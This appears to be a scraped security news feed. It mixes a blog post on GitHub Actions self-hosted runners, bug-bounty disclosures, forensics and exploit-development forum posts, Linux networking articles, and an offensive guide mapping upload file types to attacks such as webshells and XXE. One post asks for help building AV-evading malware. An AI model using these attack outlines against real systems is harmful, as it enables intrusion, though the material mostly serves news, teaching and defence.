    Today I want to talk about GitHub Actions runners. A little context before I start: most of my automation runs on GitHub Actions, namely applications written in Go and Ruby, plus Zest scripts. But since GitHub Actions runs on GitHub's runners, it runs on GitHub's servers rather than on my own, that is, overseas. That mostly does not matter, but domestic (Korean) environments sometimes block access from overseas, so things do not work properly. So last month I set up a self-hosted runner, and I am sharing the details here. What is a self-hosted runner? A self-hosted runner is a feature that lets GitHub Actions run on a PC or server the user specifies. It is as if the PC at home becomes an agent. And a self-hosted runner does not have the agent listen for connections; the agent connects out to GitHub's servers. So it is really nice that you do not have to expose your personal environment on a public IP :D Installation Installing actions-runner is simple. Download and extract the runner archive, then run run.sh and the runner starts: mkdir actions-runner && cd actions-runner curl -o actions-runner-osx-x64-2.293.0.tar.gz -L https://github.com/actions/runner/releases/download/v2.293.0/actions-runner-osx-x64-2.293.0.tar.gz tar xzf ./actions-runner-osx-x64-2.293.0.tar.gz cd actions-runner ./run.sh When you run run.sh, it walks through a few settings in an interactive shell. Once that is done you can see the runner in the GitHub repo (Repo > Settings > Actions > Runners). A registered runner can then be used in a workflow file by naming it in runs-on, like this: SecretSecret: runs-on: macOS needs: [Events] steps: - uses: actions/checkout@v2 - name: Run Zest # .... Make...

    CVE-2022–32511 | Exploit | Remote Code Execution

    SMTP Command Injection in iCalendar Attachments to Emails via Newlines
    Nextcloud disclosed a bug submitted by spaceraccoon: https://hackerone.com/reports/1516377 - Bounty: $250
    Moderators can send messages to users from banned subreddits via `oauth.reddit.com/api/mod/conversations`
    Reddit disclosed a bug submitted by zqyzoid: https://hackerone.com/reports/1543770 - Bounty: $100

    Is it feasible to image a 12tb storage server? What is the best storage solution for the image? Which imaging software? (Solaris os)
    Live imaging. Should i do a dd? submitted by /u/MasterBet

    Vulnerability Capstone | TryHackMe (THM)
    Lab Access: https://tryhackme.com/room/vulnerabilitycapstone Continue reading on Medium »
    TryHackMe | Red Team Fundamentals
    Learn about the basics of a red engagement, the main components and stakeholders involved. Continue reading on Medium »
    eJPT in My Point of View
    I am writing a post after about a year since I have been busy with studies and work. Nowadays a lot is going on in our country and people… Continue reading on Medium »

    FreeBuf Morning Report | EU holds massive cybersecurity exercise; malware took down several US state unemployment websites
    According to the latest technology trends report from Compia, cybersecurity ranks first among the ten highest-paid in-demand skills of 2022.
    [Livestream giveaways] Virtual host FreeBee debuts at CIS Conference Summer Edition
    The "CIS Conference · Summer Edition Summer Live" is coming! Lots of activities and lots of perks, just waiting for you!
    HackerOne employee sold vulnerability reports for profit
    According to HackerOne, the employee contacted seven HackerOne customers and collected bounties in a small number of disclosures.
    TikTok assures US lawmakers it is working to protect user data from Chinese employees
    TikTok is trying to reassure US lawmakers, saying it is taking steps to strengthen data security protections.
    Verified accounts hacked: threat actors use celebrity Twitter accounts to send phishing messages
    Recently, threat actors have been breaking into verified Twitter accounts.
    Five years of sweeping change in cybersecurity, in one article
    For cybersecurity, five years have transformed the entire industry; and the next golden five years of development are slowly getting under way.
    Jenkins security team discloses 29 plugins affected by zero-day vulnerabilities
    The Jenkins security team disclosed dozens of flaws affecting 29 plugins for the Jenkins automation server, most of which have not yet been fixed.
    Microsoft has found the Raspberry Robin worm in hundreds of networks
    Microsoft recently discovered the Raspberry Robin worm on the networks of hundreds of organizations across a range of industries.
    FreeBuf Morning Report | TikTok's Chinese employees can access some non-sensitive US user data; HackerOne employee "steals from the till"
    TikTok CEO Shou Zi Chew said that non-US employees, including Chinese employees, will be able to access a small portion of non-sensitive TikTok US user data.

    NAPALM FTP Indexer
    submitted by /u/thiskeepsmeupatnight

    Kubeclarity – SBOM and Vulnerability Detection
    Article URL: https://sectool.co/blog/kubeclarity-sbom-vulnerability-detection Comments URL: https://news.ycombinator.com/item?id=31970937 Points: 2 # Comments: 0
    A HackerOne Employee Stole Vulnerability Reports from Security Researchers
    Article URL: https://www.pcmag.com/news/a-hackerone-employee-stole-vulnerability-reports-from-security-researchers Comments URL: https://news.ycombinator.com/item?id=31970622 Points: 9 # Comments: 1

    Geolocation #3— Finding Shoigu
    On 26th June 2022, several videos appeared on Twitter showing Sergei Shoigu, the Minister of Defence of the Russian Federation, reportedly… Continue reading on Medium »
    Good News Roundup: the OSINT-inspired Geek Edition
    In good news, OSINT explains Ukraine’s latest victories, Africa uses AI to track locusts, and BirdNet successfully IDs birds by their songs Continue reading on Medium »
    Pantellica’s Inaugural OSINT Championship
    We’re excited to announce the launch of our inaugural OSINT Championship. This initiative is yet another unique pioneering effort by… Continue reading on Medium »
    SPY NEWS: 2022 — Week 26
    Summary of the espionage-related news stories for the Week 26 (June 26-July 2) of 2022. Continue reading on Medium »

    nday exploit: netgear orbi unauthenticated command injection (CVE-2020-27861)
    submitted by /u/0xdea
    Bypassing Firefox's HTML Sanitizer API
    submitted by /u/digicat
    Code replay attack on the myGovID Scheme
    submitted by /u/Gallus

    House of Gods
    Worked on a new heap technique for older versions of glibc. House of Gods hijacks the thread_arena within 8 allocs and drops a shell after 10. Works for glibc < 2.27 and was tested against 2.23, 2.24, 2.25 and 2.26. Currently trying to adapt this technique (or parts of it at least) to recent versions of glibc. But I have yet to find a way. If you have further ideas/improvements, let me know :) https://github.com/Milo-D/house-of-gods/blob/master/HOUSE_OF_GODS.TXT Same repo contains a small PoC. submitted by /u/__milo21
    Need help restoring execution after stack overflow in windows kernel
    I'm currently trying to exploit a driver. I was able to perform a stack overflow and execute my shellcode after disabling SMEP, but it's causing a BSOD just after executing the shellcode due to the registers and stack being corrupted. I read many articles trying to understand how to restore execution after executing the shellcode but couldn't find any success. I would really appreciate it if someone can help guide me through this one. If you can help me please shoot me a PM. Thanks submitted by /u/DudewithCoolusername

    SecWiki News 2022-07-03 Review
    No new articles today. For more of the latest articles, visit SecWiki

    A swag for an Open Redirect — Google Dork — Bug Bounty
    Hello Folks 👋,I have found a good open redirect with my param scanner. I will tell you here how I found it and what kind of swag I got… Continue reading on InfoSec Write-ups »
    DNS in Active Directory

    How to become a red team operator
    What is a Red Team? Continue reading on Medium »

    What do you think is lacking in the industry nowadays?
    This may be too vague of a topic, but for those who have been in the field a while, what do you wish existed that would make your job easier/better? What do you wish you had when you were first starting out? Whether it be research, training, resources, what are some things that would benefit the DFIR world for veterans and newcomers alike? submitted by /u/Corrsta

    Purple Team | Importance and Strategical Execution of Defense
    Purple Team is a group of cybersecurity experts who play the roles of the Blue and Red Teams in a cybersecurity exercise in order to… Continue reading on Medium »

    A roadmap for a beginner exploit dev/security research
    Hello everyone, so I'm just trying to find an ideal roadmap. I've been playing CTFs and solving pwn challenges and stuff, so now I want to move away from the basics and get into some real targets. So what do you guys think I should focus on: something like routers and cheap IoT devices and try to find vulns in those and try to somehow get internships / jobs based on that, or should I try to focus on something like browser exploitation (which I'm interested in) and get more knowledge of browsers and stuff and try to find bugs in them (which might take a long time and find low impact bugs as compared to something like routers / IoT devices, which might be more difficult)? submitted by /u/MrXy0nixOG

    SecWiki News 2022-07-02 Review
    afrog is a high-performance, fast and stable vulnerability scanner with customizable PoCs by 胖胖的ALEX; BlueHound, a self-developed host threat hunting tool by ourren; Notes on setting up Jira and related exploitation by ourren; A brief look at Shiro CVE-2022-32532 by ourren; Implementing JARM fingerprint randomization by ourren. For more of the latest articles, visit SecWiki

    Insufficiently protected credentials vulnerability fixed in curl 7.83.0
    Article URL: https://packetstormsecurity.com/files/cve/CVE-2022-27776 Comments URL: https://news.ycombinator.com/item?id=31959958 Points: 1 # Comments: 0

    Insecure File Upload
    🔍 Introduction File upload is a widely used feature on the web. It lets a local file be uploaded to the server, and allowing unsafe files to be uploaded creates security problems. Attacks that abuse file upload in this way are called Insecure File Upload, Upload Insecure File, File Upload vulnerabilities, and so on. Depending on the conditions, an insecure file upload is typically used for a webshell, XSS, CSRF, or as a staging point for distributing malicious files, and its impact is as broad as that of XSS. 🗡 Offensive techniques Detect: every place where a file is uploaded is a testing point. Typical examples are features whose purpose is file upload and features that upload images; these can be identified by eye or through tools' passive scanning. Attack vectors by file type (extensions: attack vectors): JSP, ASP, PHP (ASPX, PHP5, etc.): webshell / RCE; SVG, XML (and XML-based files): persistent XSS / SSRF / XXE; GIF: persistent XSS / SSRF; CSV: CSV injection; AVI, MP4, MPEG (videos): LFI / SSRF; HTML, JS: HTML injection / XSS / open redirect; PNG, JPEG: persistent XSS, pixel flood attack (DoS); ZIP: RCE via LFI / DoS; PDF, XLSX, PPTX, DOCX (OXML): SSRF / blind XXE. Exploitation WebShell: if the server on which the uploaded file runs supports server-side execution of the file itself, such as PHP, JSP, ASP or Perl, a webshell can be uploaded to take over the system. Extensions PHP .php...
    WebSocket Security
    🔍 Introduction WebSocket is a protocol built so that the server and the browser can communicate in real time, making up for the shortcomings of HTTP as a connectionless request protocol; after an HTTP-based handshake it communicates and exchanges data over TCP/TLS. A similar feature is SSE (Server Sent Events). SSE is a technology for one-way communication, whereas WebSocket is for two-way communication. Handshake and Data transfer WebSocket communication can be divided into the handshake and data transfer. Handshake Because WebSocket fundamentally runs on top of the web, the handshake begins over the HTTP protocol. When the browser sends an Upgrade request to the web server, the server returns a status code in an HTTP response: 101 Switching Protocols, 400 Bad Request, 415 Unsupported Media Type, and so on. On success it returns 101 Switching Protocols with the upgrade header set to websocket, the browser opens the WebSocket connection, and the data transfer phase begins. Data transfer After the WebSocket handshake, the data transfer phase can send and receive data without any particular format, much like ordinary socket communication. Depending on the framework or library, an additional protocol may be used; a typical example is Spring Boot's STOMP protocol. WS:// and WSS:// Just like the difference between http:// and https://, WebSocket is split into unencrypted and encrypted sockets, ws:// and wss://. Naturally, since https:// forbids mixed content, a connection is not forced to ws://. Example if ('WebSocket' in window) { var oSocket = new WebSocket("ws://localhost:80"); oSocket.onmessage = function (e) { console.log(e.data); }; oSocket.onopen = function...

    Linux Forensics
    Good morning, Does anyone have any recommendations on books for Linux Forensics? What about learning resources in general? Happy weekend and happy learning. submitted by /u/DeadBirdRugby

    Day to Day activities of an Azure admin
    Hi Team, if there are any Azure administrators in this group who have shifted their career from a Windows Administrator role, I just want to know what your real-time day-to-day activities are that you perform in your organization on the Azure portal as an Azure admin, like application registration, VM provisioning, etc. submitted by /u/Krish03101991

    Federated editing allows iframing possibly malicious remotes
    Nextcloud disclosed a bug submitted by rtod: https://hackerone.com/reports/1210424 - Bounty: $100

    Fuzzing in Go
    Running fuzz tests in Go Continue reading on Go Recipes »

    Bulk Analysis of Cobalt Strike’s Beacon Configurations
    submitted by /u/DLLCoolJ

    Linux network stack principles, monitoring and tuning: preface
    This series tries to introduce the kernel 5.10 network stack from the perspective of engineering research and practice (rather than pure theory), in three areas: principles and implementation, monitoring and alerting, and configuration tuning. Because there is a lot of material, it is split into several articles. Principles and implementation: Linux network stack principles, monitoring and tuning: preface; Linux interrupts (IRQ/softirq) basics: principles and kernel implementation; Linux network stack receive (RX): principles and kernel implementation; Linux network stack transmit (TX): principles and kernel implementation (TBD). Monitoring: Monitoring Linux Network Stack. Tuning: Linux network stack receive (RX): configuration tuning; Linux network stack transmit (TX): configuration tuning (TBD). As engineers working on networking, virtualization, reliability and similar areas, we constantly run into all kinds of network problems. By the well-known 80/20 rule, 80% of these are routine problems solved through system or service logs, past experience, or a Google/StackOverflow search, taking anywhere from minutes to hours; the remaining 20% cannot be located and solved quickly and need some extra expertise and time to investigate, for example skimming the relevant code or raising the suspicious point with the community or a mailing list, taking hours to days. Applying the 80/20 rule again to that 20%, 80% of it (20% * 80% = 16%) can be solved in a few hours or days by reading code, testing, or getting community help, while the remaining 20% (20% * 20% = 4%) needs deeper digging before the problem can even be located. If you like, you can apply the 80/20 rule once more; what remains after the third round is 0.8%. This long tail is small enough, but the time needed to solve these problems is usually correspondingly long. For this class of (performance) problems we must study the entire network stack systematically and understand which modules a packet passes through and what processing it receives from arriving at the NIC until it is finally picked up by the application. There is no shortcut, unless your business side can tolerate that long tail or you engineer around the problems, the simplest example being adding machines to lower the load. But in the cloud-native era, with programmable networking, functional requirements also demand domain knowledge of the kernel network stack. For example, Kubernetes uses a very flexible spec & impl design: it describes in a contract-like way what many k8s features should look like, and leaves the concrete implementation to developers or vendors. Two network-related examples: ServiceIP abstracts an L4 load-balancing scheme, and how it is implemented and with what technology is entirely up to the network solution; NetworkPolicy abstracts an L3/L4 access-control scheme, and how and with what technology it is implemented is likewise entirely up to the network solution. If you had to implement these two (as a demo), what networking knowledge do you think you would need? Which modules and subsystems of the network stack would you need to be familiar with, and to what depth? Two references: Cracking Kubernetes Node Proxy (aka kube-proxy); Cracking Kubernetes Network Policy. With a complete understanding of kernel networking, a whole new world opens up, and you will also see the preceding layers of "80" problems in a completely different light. The early "Linux network stack monitoring and tuning: receiving data (2016)" is of ever-decreasing reference value today, for many reasons: the kernel and NIC driver are too old (kernel 3.13, 1Gbps igb NIC driver), and especially for container and network virtualization teams such a configuration is an antique; it is all text with no figures and very unintuitive (the original author later published a companion illustrated piece, but with only a few figures, and it is also too old); monitoring and tuning content is mixed into the code analysis, a bit messy and impossible to look up quickly, and some tuning advice is outdated; it does not cover how to visualize core metrics with a modern monitoring system such as Prometheus+Grafana; … This series follows the main thread of that article but reorganizes the whole network stack processing flow and some monitoring and tuning options on a newer kernel: kernel 5.10, with a Mellanox 25Gbps NIC on the mlx5_core driver; it adds more than twenty flow charts and call stacks of the core modules for clarity, to help keep the main thread straight; it splits out the monitoring and tuning parts for quick lookup and reference, avoiding jumping back and forth between fine details, and updates some tuning advice based on the kernel version and production experience; it shows how to monitor network metrics with a modern monitoring system; and it adds some newer material from recent years where appropriate, such as BPF/XDP. This series is about the "Linux networking stack", where "stack" means not just the kernel protocol stack but the whole path, kernel protocol stack included, from a packet arriving at the physical NIC to being picked up by a user-space program, as shown in the figure below (receive path and steps): Fig. Steps of Linux kernel receiving data process and the corresponding chapters in this post. This series still has many incomplete parts and may contain errors; it is for study reference only and will be updated from time to time.
    Linux network stack receive (RX): configuration tuning
    This series tries to introduce the kernel 5.10 network stack from the perspective of engineering research and practice (rather than pure theory), in three areas: principles and implementation, monitoring and alerting, and configuration tuning. Because there is a lot of material, it is split into several articles. Principles and implementation: Linux network stack principles, monitoring and tuning: preface; Linux interrupts (IRQ/softirq) basics: principles and kernel implementation; Linux network stack receive (RX): principles and kernel implementation. Monitoring: Monitoring Linux Network Stack. Tuning: Linux network stack receive (RX): configuration tuning. 1 Network device driver initialization: 1.1 Adjusting the number of RX queues (ethtool -l/-L); 1.2 Adjusting RX queue size (ethtool -g/-G); 1.4 Adjusting RX queue weights (ethtool -x/-X); 1.5 Adjusting RSS RX hash fields (ethtool -n/-N); 1.6 Binding flows to CPUs: ntuple filtering (ethtool -k/-K, -u/-U). 2 NIC packet reception. 3 DMA copies packets into the RX queue. 4 IRQ: 4.1 Interrupt coalescing (ethtool -c/-C); 4.2 Adjusting hard IRQ affinities (/proc/irq//smp_affinity). 5 SoftIRQ: 5.1 Discussion: the NAPI poll mechanism; tracing IRQ/softirq calls with perf; field descriptions for /proc/net/softnet_stat; 5.2 Adjusting the softirq receive budget: sysctl netdev_budget/netdev_budget_usecs. 6 softirq: moving packets from the ring buffer into the protocol stack: 6.1 Changing GRO settings (ethtool -k/-K); 6.2 sysctl gro_no…
    Linux network stack receive (RX): principles and kernel implementation
    Fig. Steps of Linux kernel receiving data process and the corresponding chapters in this post. This series tries to introduce the kernel 5.10 network stack from the perspective of engineering research and practice (rather than pure theory), in three areas: principles and implementation, monitoring and alerting, and configuration tuning. Because there is a lot of material, it is split into several articles. Principles and implementation: Linux network stack principles, monitoring and tuning: preface; Linux interrupts (IRQ/softirq) basics: principles and kernel implementation; Linux network stack receive (RX): principles and kernel implementation; Linux network stack transmit (TX): principles and kernel implementation (TBD). Monitoring: Monitoring Linux Network Stack. Tuning: Linux network stack receive (RX): configuration tuning; Linux network stack transmit (TX): configuration tuning (TBD). 0 Overview of the receive (RX) process. 1 NIC driver initialization: 1.1 A little bit about Mellanox NIC drivers; 1.2 Driver module registration: module_init() -> init() -> pci/mlx5e init; 1.3 PCI-related initialization: 1.3.1 PCI driver list registration: pci_register_driver(); 1.3.2 The kernel finds and loads a driver for the NIC: pci_driver->probe(), call stack and flow chart; initializing devlink: mlx5_devlink_alloc(); initializing debugfs and some WQs: mlx5_mdev_init(); initializing the PCI-related parts: mlx5_pci_init(); initializing hard interrupts (IRQ) and setting the NIC state to UP: mlx5_load_one(); 1.4 Ethernet-related initialization: mlx5e_init() …
    Linux interrupts (IRQ/softirq) basics: principles and kernel implementation
    1 What is an interrupt? 2 Hard interrupts: 2.1 Interrupt handling flow; 2.2 Maskable and non-maskable; 2.3 Problem: run fast enough vs. fairly complex logic; 2.4 Solution: deferred interrupt handling. 3 Soft interrupts: 3.1 The softirq subsystem; 3.2 Main processing; 3.3 Preventing softirqs from hogging the CPU; 3.4 Hard interrupt -> soft interrupt call stack; steps in triggering and executing a softirq. 4 Three ways to defer work (softirq/tasklet/workqueue): 4.1 Internal organization of softirq; triggering (waking) a softirq; 4.2 tasklet; 4.3 workqueue: use cases; structures. References. One of the important use cases of interrupts (IRQ), and especially soft interrupts (softirq), is sending and receiving network packets, but it is not the only one. This article collects the general basics of IRQ/softirq; these have no direct relationship to network packet processing, although the immediate purpose of writing it is to understand packet processing better. 1 What is an interrupt? A CPU handles many tasks by time-sharing, including hardware tasks such as disk reads and writes and keyboard input, and software tasks such as network packet processing. At any given moment a CPU can handle only one task. When some hardware or software task is not currently running but wants the CPU to handle it immediately, it sends the CPU an interrupt request: it wants the CPU to stop what it is doing and serve "me" first. Interrupts notify the CPU in the form of events, which is why we often see phrasing like "under condition XX, interrupt event XX is triggered". Two types: interrupts generated externally or by hardware, such as a key press; interrupts generated by software, and interrupts raised by exceptional events, such as division by zero. The device that manages interrupts: the Advanced Programmable Interrupt Controller (APIC). 2 Hard interrupts 2.1 Interrupt handling flow Interrupt…

    Distros and RegRipper, pt deux
    Now and again I pop my head up and take a look around to see where RegRipper has been, and is being, used. My last blog post on this topic had quite a few listings, but sometimes changing the search terms reveals something new, or someone else has decided to use RegRipper since the last time I looked. References to RegRipper go way back, almost as far as RegRipper itself (circa 2008): SANS blog (2009) SANS blog (2010) SANS Infosec Handler's Diary blog (2012) Kali Tools (RR v2.5) SANS Blog, Mass Triage, pt 4 (2019) The latest commercial forensics platform that I've found that employs RegRipper is Paraben E3. I recently took a look at the evaluation version, and found "rip.pl" (RegRipper v3.0 with modifications) in the C:\Program Files\Paraben Corporation\Electronic Evidence Examiner\PerlSmartAnalyzer folder, along with the "plugins" subfolder. You can see the Registry parsing in action and how it's incorporated into the platform at the Paraben YouTube Channel: AppCompatCache parsing Reviewing Data from AmCache Reviewing the videos, there's something very familiar about the output illustrated on-screen. ;-) Other Resources (that incorporate RegRipper) YouTube video by Ric Messier CAINE forensics video PacktPub Subscription LIFARS Whitepaper on Shellbags Windows Registry Forensics, 1/e (PDF) Paradigm Solutions blog Jason Shaver's NPS thesis (2015) That's just one more step toward world domination! This is where I tent my fingers and say "Excellent" like Mr. Burns! PS: While I was looking around recently, I saw something I hadn't seen before...early in Jan, 2020, an issue with the Parse::Win32Registry module parsing 64-bit time stamps was identified. I'd updated the module code, recompiled the EXEs, and put them up on Github.  I found recently that James, the author of the module, had updated it in Sept, 2020. That's great, but there are a few other tweaks I'd made to the code, one that allowed me to check to see if hives are 'dirty'.

    GitLab remote code execution vulnerability (CVE-2022-2185)
    A GitLab remote code execution vulnerability affecting all versions from 14.0 to 14.10.5, from 15.0 to 15.0.4, and from 15.1 to 15.1.1, in which an authorized user can import a maliciously crafted project, leading to remote...

    What is being a malware analyst like?
    What is being a malware analyst like? How many hours do you guys work? Is it stressful? What certificate do I need to become a malware analyst? submitted by /u/ELIDAL99
    Email/Password vs Social Login vs Passwordless(magic links), which one is most vulnerable and how to choose the best strategy for users
    As a developer of a user authentication library, I get asked this question a lot. This is definitely a subjective question and I struggle to answer it appropriately other than saying "it depends". So I want to open up this question to this knowledgeable community for opinions on how developers can choose the right authentication strategy for their users. Your experience as NetSec can be really valuable in educating developers. You don't need to answer everything, just pick one aspect and share your thoughts. By the end of the discussion, we will have a useful conversation that developers can learn from. submitted by /u/10xpdev
    SANS SEC 560 Class Notes by Jeff McJunkin
    Found this old tweet from Jeff McJunkin for his SANS SEC560 class in Minneapolis. https://twitter.com/jeffmcjunkin/status/755395680194039808 I thought it might be useful to the infosec community, especially to those who are planning to take this exam. You can find the doc here. https://docs.google.com/document/d/19qp1aLg8LG8_lT0a-R-ilXIq0rCXKAR011Nj1pVo5TI/edit Not sure if he keeps updating this doc or not since he tweeted this 6 years ago. If you happen to know, let me know. Thanks submitted by /u/w0lfcat

    June 2022 Incident Report
    HackerOne disclosed a bug submitted by jobert: https://hackerone.com/reports/1622449
    Unauthorized Access - downgraded admin roles to none can still edit projects through brupsuite
    Omise disclosed a bug submitted by zombieesshx: https://hackerone.com/reports/1607756

    Any idea what's going on here?
    Found this in a Google search: http://82.146.38.215/text/ Appears to be arrays of text snippets randomly collected and loosely related to the subject implied by each filename. In the middle of a file on customer complaints, there appears to be text from websites about cookie policies, which makes me think this is randomly collected. Do these look like fragments to form random text at the end of spam messages? Phrases for training a neural network? Something else? Just curious. submitted by /u/CommanderPowell
    Not sure what this is -- Modules. Maybe someone could explain.
    submitted by /u/brother_p
    Incel 101
    submitted by /u/brother_p
    solar panel wiring diagrams and manuals
    submitted by /u/PM_ME_TO_PLAY_A_GAME
    Just found this
    submitted by /u/thiskeepsmeupatnight
    wget (maybe) help?
    Hi. Newb here. Not exactly OD related, buuuut I was wondering if someone could share a wget script, app, link or anything of the sort to help me download some files. The site's not online anymore, but I can access the files (.jpgs) via the Wayback Machine. An example url would be something like http://superkewlfictionalwebsite.com/pics/superkewlpic.jpg Or https://web.archive.org/web/2014*/http://superkewlfictionalwebsite.com/pics/superkewlpic.jpg Many thanks in advance submitted by /u/bweezy320

    War in Ukraine / June 30
    Russia left Snake island. It seems completely Continue reading on Medium »

    SecWiki News 2022-07-01 Review
    No new articles today. For more of the latest articles, visit SecWiki

    Building a scalable static analysis program at Razorpay
    submitted by /u/jubbaonjeans
    Intel SGX deprecation review
    submitted by /u/hardenedvault
    It’s Been Zero Days Since BIND9 Crashed
    submitted by /u/jen140

    IW Weekly #5: Account Takeover, Recon, Ransomware Creation, and more.
    Let’s Understand SSRF vulnerability
    Introduction Continue reading on InfoSec Write-ups »

    FreeBuf Weekly | Provisions on the Administration of Internet User Account Information take effect on August 1; former Canadian government employee took part in ransomware attacks
    With the approval of the Cybersecurity Review Office, BOSS Zhipin, Yunmanman and Huochebang have resumed new user registration.
    Black Basta ransomware distributed via QakBot
    Since it began operating in April 2022, Black Basta has attacked nearly 50 organizations worldwide. The attackers use a "double extortion" strategy: victims who do not pay the ransom have their data published.
    Revive: from spyware to banking trojan
    In June 2022, Cleafy researchers discovered a new Android banking trojan, Revive.
    "Douxiang Attack-Defense Drill Handbook": "Detecting red team covert tunnels"
    Xiangshou combines static covert-tunnel signatures with a covert-tunnel model so that covert-tunnel communication attacks have nowhere to hide.
    How to "guard against phishing" during attack-defense drills | FreeBuf enterprise group discussion
    During HVV, real-world phishing techniques can take many forms, so what detection and defense measures are available? In phishing exercises, which strategies effectively test employees' security awareness?
    BlueHound: a self-developed host threat hunting tool
    BlueHound is a GUI host threat hunting tool. It supports on-host/offline scanning for webshells, scanning for CobaltStrike beacon programs, and memory scanning, and is built on .NET 4.6.
    Enterprise security building | Reflections on the practical journey of building information security
    When enterprises plan their information security programs, a "defense in depth" architecture is the reference most of them adopt; guided by that idea, the first priority is top-level architecture design and comprehensive planning of information security work, in order to build a complete protection system and keep improving protective capability.
    Aimed straight at Word attachments: AstraLocker 2.0 ransomware arrives!
    Recently, a little-known ransomware family called AstraLocker released its second major version.
    Malware uses API hammering to evade sandbox detection
    Researchers found a new implementation of the sandbox-evasion technique API hammering in recently discovered Zloader and BazarLoader samples.
    MuddyWater continues to target the Middle East
    MuddyWater is believed to be a group operated by Iran's Islamic Revolutionary Guard Corps, primarily serving Iranian national interests.
    FreeBuf Consulting × Vulbox jointly release the "2022 Cybersecurity Attack and Defense View"
    The CSAD view covers a cross-industry cyberattack path map, a cross-industry cyber defense path map, an environment security layout map, and a security operations team building map.

    Learn about Docker Container Security in Detail
    Are you looking for a series of posts that take a deep look at containers from an information security perspective? In my blog's "Docker Container Security" series, I've got you covered. https://tbhaxor.com/docker-containers-security/ submitted by /u/tbhaxor
    How to get started with malware development?
    Hi, I want to get started with malware development. I am familiar with Python, C/C++ and asm32. I want to learn to build my own malware (complete control with the Win32 API) and a C2 framework. I recently finished asm and made my own shellcode encoder that brought down the detection rate from 11 to 3. I want to build malware with AV and der bypassed. I have just started learning about the Win32 API but it feels like I'm missing a lot of concepts like handles, TCHARs etc. which I don't know about. There are just so many things to learn like the Win32 API, process injection etc. and I have no idea where to start. Any help suggesting an ideal pathway would be really helpful. submitted by /u/Horse-Trojan
    Free Course online: Introduction to Cybersecurity by Cisco Networking Academy
    submitted by /u/cybersocdm

    What's the difference between a logical copy and a physical copy in a Windows forensic image?
    What are the main targets of each? submitted by /u/ArticleUseful211

  • Open

    Feishu / Lark Data Extraction
    Has anybody dealt with Feishu/Lark before? I need to export files and chat conversations and none of my tools (Axiom, Cellebrite) are capable of extracting the data. submitted by /u/Markarov_93
    How can I create my own tool to acquire RAM memory?
    Hi community, I want to build a tool like Belkasoft RAM Capturer, but I'm not getting any idea about how to capture RAM via C or Python. Any suggestions would be great, thanks in advance. submitted by /u/Aromatic_Ideal_2933
    Data recovery on a Lumia 550
    Internal data recovery in MSFT Lumia 550, no SD card. Hey, I have been given a MSFT Lumia 550 to try and recover the internal data that has been lost but I'm not having any luck. I run Windows and Linux, and have data recovery software for phones and Windows but it is not showing on either one? It shows in File Explorer but not in Disk Management or AOMEI Partition Assistant. The screen works and there are no other issues. If anyone could advise or point me in the right direction it would be great. Device information:
    Model: Microsoft Lumia 550
    Service provider: 02
    Software: Windows 10 Mobile
    Installed RAM: 1 GB
    Version: 1709
    OS build: 10.0.15254.527
    Firmware revision number: 01078.00042.16352.50009
    Hardware revision number: 3.0.0.1
    Radio software version: 10c56.00030.0001
    Chip SOC version: 8909
    Screen resolution: 720x1280
    submitted by /u/sudo_oth
    Time Machine encrypted with Filevault2 wont accept known password.
    History: MacBook 15" Samsung 1TB AHCI SSD died, non recoverable (S4LN058A01 controller not supported in PC3000, degraded memory, corrupted firmware/bad bytes...), won't ID, any interaction with it will stay in BSY mode, won't clone. The only hope now was the Time Machine backup (Filevault2). This is with Monterey OSX. Time Machine backup is 1.5TB in iSCSI format, but I cloned it to a .img format to work with it now.I must say this backup was used everyday, and it would mount automatically when logged into the computer. There were two users, user1 and user2, both with the same password. Both admin. Password has been the same for years, but suddenly time machine wont mount, saying credentials are incorrect. I have seen this scenario happen to a lot of people over the years. There is also…
  • Open

    Advice on SEC599 vs SEC699
    Hi there, I'm seeking advice for a SANS course (or similar; money being no object for a single course). I did SEC555 a while ago but I'm not really into setting up SIEM anymore; I'm more focused on devising new detection rules (that colleagues will be implementing). I'm very much "blue", not really into pure red courses/exams like OSCP or GPEN, but I am interested in purple; my main driver is to learn as much new stuff as possible. We have fairly mature SIEM(s) with existing rules, and people reviewing and/or thinking about new ones. I'm already familiar with MITRE ATT&CK and have started prioritizing techniques for my domain of interest. What I'm looking for is a course that would bring the most value to my team: new ideas or ideas that we didn't think about, challenging the MITRE technique prioritization, etc. I've looked at both 599 and 699 (even the 599 vs 699 FAQ on the SANS website) but can't decide... I haven't found many reviews for 699. I wonder how much of 599 will be a refresh for me. I've also considered FOR572 because I've always wanted to do it, and we don't do much with the flows... I think we could get some low-hanging fruit there (an NDR solution is being set up). Any advice or experience you can share is welcome, thanks! submitted by /u/FreshGap5328
    What should be checked to give network access from internal to external IP?
    Hello. I wonder how this happens in other companies. Perhaps you could share your experiences. I am often asked by devs to change or create firewall rules for their dev needs. Sometimes it's hard for me to know how safe it is. If the request is from internal to external: 1) I check whether there are vulnerabilities on my machine that will have access to the external IP. 2) I check the encryption status of the external IP/URL with SSL checkers. 3) I always ask to be given more specific IP ranges and ports. What kind of playbooks do you have? submitted by /u/athanielx
  • Open

    Flubot: the evolution of a notorious Android Banking Malware
    submitted by /u/Goovscoov
    RanSim: a ransomware simulation script written in PowerShell. Useful for testing your defenses and backups in a controlled simulation. The same script is used for encryption and decryption.
    submitted by /u/doctormay6
    Weaponizing and Abusing Hidden Functionalities Contained in Office Document Properties
    submitted by /u/McLabraid
    Cloudy with a Chance of Risk: Managing Risks in Cloud-Managed OT Networks
    submitted by /u/c_f13
    How to expose a potential cybercriminal due to misconfigurations
    submitted by /u/CyberMasterV
    Starting an AppSec program the simple way
    submitted by /u/theappsecteam
    Golang code review notes by elttam
    submitted by /u/Gallus
  • Open

    What Does Zero-Day Vulnerability Mean?
    Article URL: https://pacgenesis.com/what-does-zero-day-vulnerability-mean/ Comments URL: https://news.ycombinator.com/item?id=31938463 Points: 1 # Comments: 0
  • Open

    GitHub - lawndoc/RanSim: Ransomware simulation script written in PowerShell. Useful for testing defenses and backup in a controlled setting. The same script and key is used for decryption.
    submitted by /u/doctormay6
    New Offsec post: Weaponizing and Abusing Hidden Functionalities Contained in Office Document Properties
    TJNull posted this a few hours ago on the Offensive Security Blog; it seems to utilise macros within Office to gain leverage, which seems pretty cool. It's called "Weaponizing and Abusing Hidden Functionalities Contained in Office Document Properties". Tweet: https://twitter.com/TJ_Null/status/1542507690441682945?t=aa7IB9DN9CAddzT-Wc7Kmg&s=19 Article: https://www.offensive-security.com/offsec/macro-weaponization/ There is also a proof of concept: https://m.youtube.com/watch?v=8ZePZzdVQT8&feature=emb_logo submitted by /u/McLabraid
    Toll fraud malware: How an Android application can drain your wallet
